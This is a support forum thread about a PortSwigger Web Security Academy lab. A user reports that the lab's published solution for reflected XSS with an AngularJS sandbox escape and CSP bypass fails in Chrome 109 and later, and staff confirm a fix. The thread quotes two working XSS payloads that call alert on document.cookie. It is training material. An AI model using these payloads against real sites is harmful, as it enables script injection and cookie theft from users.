Burp Suite User Forum

Create new post

Wrong solution in WSA Expert lab XSS: Reflected XSS with AngularJS sandbox escape and CSP

Aetius | Last updated: Jan 19, 2023 09:42PM UTC

Hello, in the WSA Lab titled 'Reflected XSS with AngularJS sandbox escape and CSP', the solution section is wrong because it suggests this payload: location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; But as mentioned at the end of one of your publications (https://portswigger.net/research/angularjs-csp-bypass-in-56-characters) 'Since Chrome 109 the path property has been removed. The workaround is to use composedPath() instead.'. So the new solution is: location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; I tested both in my up-to-date Chrome browser and also in the lab: only the solution containing $event.composedPath() instead of $event.path works and validates the challenge so you should correct it in the writeup. Thank you for your amazing learning material!

Michelle, PortSwigger Agent | Last updated: Jan 20, 2023 02:46PM UTC

Thanks for getting in touch :) We'll pass this on to the team.

Aetius | Last updated: Jan 31, 2023 11:12AM UTC

Hi again, So were you able to fix the solution or was I wrong in some way ?

Michelle, PortSwigger Agent | Last updated: Jan 31, 2023 11:42AM UTC

Hi Sorry for not getting in touch earlier, we've updated the solution :) Thank you for getting in touch and bringing it to our attention.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.